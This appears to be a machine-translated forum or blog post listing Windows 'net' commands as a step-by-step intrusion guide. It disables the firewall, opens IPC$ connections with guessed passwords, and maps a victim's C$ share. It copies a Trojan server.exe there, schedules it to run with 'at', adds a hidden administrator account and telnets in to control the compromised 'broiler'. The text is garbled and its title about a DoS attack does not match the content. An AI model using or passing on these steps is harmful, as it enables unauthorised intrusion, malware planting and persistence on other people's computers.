Windows dos attack, flooding some commands to explain (1)

Some commonly used net commands and examples: ip address I take 192.168.1.1 as an example, generally like we can not connect but can not perform other operations , can turn off the firewall net stop
sharedaccess

1, establish ipC connection or direct mapping command

net use \\\\ip\\ipc$ password /user:username< Br>

net use \\\\ip\\abc username:admin$123

For example:

net use \\\\192.168.1.1\\ipc$ 123456 /user :administrator

This command means to establish an ipc$ null connection with the host 192.168.1.1 whose username is adminidtrator is 123456.

2. Delete ipC$ empty connection

net use \\\\ip /Del

For example:

net use \\\\192.168.1.1 /del

Delete the ipc$ connection established with host 127.0.0.1

3. Start shutdown service:

net start \\\\View already opened services

net start servername

net stop servername

Such as:

net start telnet \\\\ open telnet service

net stop telnet \\\\ turn off telnet service

4, start to close sharing

net shate ipc $ \\\\ open ipc$ default share

net share ipc$ /del \\\\ close ipc$ default share

net share c=c:\\ \\\\full share c drive

net share d=d:\\ \\\\Delete fully shared ddisk

net share e$=e:\\ \\\\Create hidden shared edisk

5. Map hard disk

net use z: \\\\ip\\c$

For example:

net use z: \\\\192.168.1.1\\c$ \\\\Map 192.168.1.1 C drive The z disk of the cost machine

Description: After the mapping is successful, you will have a hard disk Z in my computer. In fact, Z is the C disk of 192.168.1.1!

net use z: /del \\\\Disconnect mapping

The role of the intrusion: After mapping the other's hard disk, we can directly copy the file to the other's hard disk.

Conditions for successful implementation: ipc$ connection must be established with the other party

6. Remote copy file_Copy

Copy e:\\3389.exe \\\\192.168.1.1\\c$ \\ \\Copy the 3389.exe file under the local E disk to the root directory of the C disk of the other 192.168.1.1 system

The role of Copy in the invasion: copy the local file to the other hard disk

Copy replication required conditions: must establish ipc$ connection with the host

7, view the remote system time

net time \\\\ip

net time \\ \\192.168.1.1 \\\\View the local time of the remote host 192.168.1.1

Function: Get the other party's time to prepare for the scheduled task of the Trojan.

8. Run the program remotely

At \\\\ip time server.exe

At \\\\192.168.1.1 12:30 c:\\server.exe \\\\Let the host run at 12:30 noon we have copied The Trojan server.exe

in the root directory of the C drive works in the invasion: so we can use our Trojan server to connect our Trojans, and better use the graphical method to control the broiler. Use the genius ^_^)

9, add the administrator account:

net user ylinuxs 123456 /add \\\\ add a password for the 123456 user named ylinuxs

Net localgroup administrators ylinuxs /add \\\\ Promote ylinuxs as an administrator or join the administrator group is right

Note: Some system administrators are not administrators. You should follow the actual situation. Change, but the administrator group of 99.9% of the system is still administrators.

Modify user password:

net user ylinuxs 123 \\\\Change user ylinuxs password to 123

10, remote login host _telnet

telnet Ip port

For example: telnet 192.168.1.1 135 \\\\Connect to port 135 of 192.168.1.1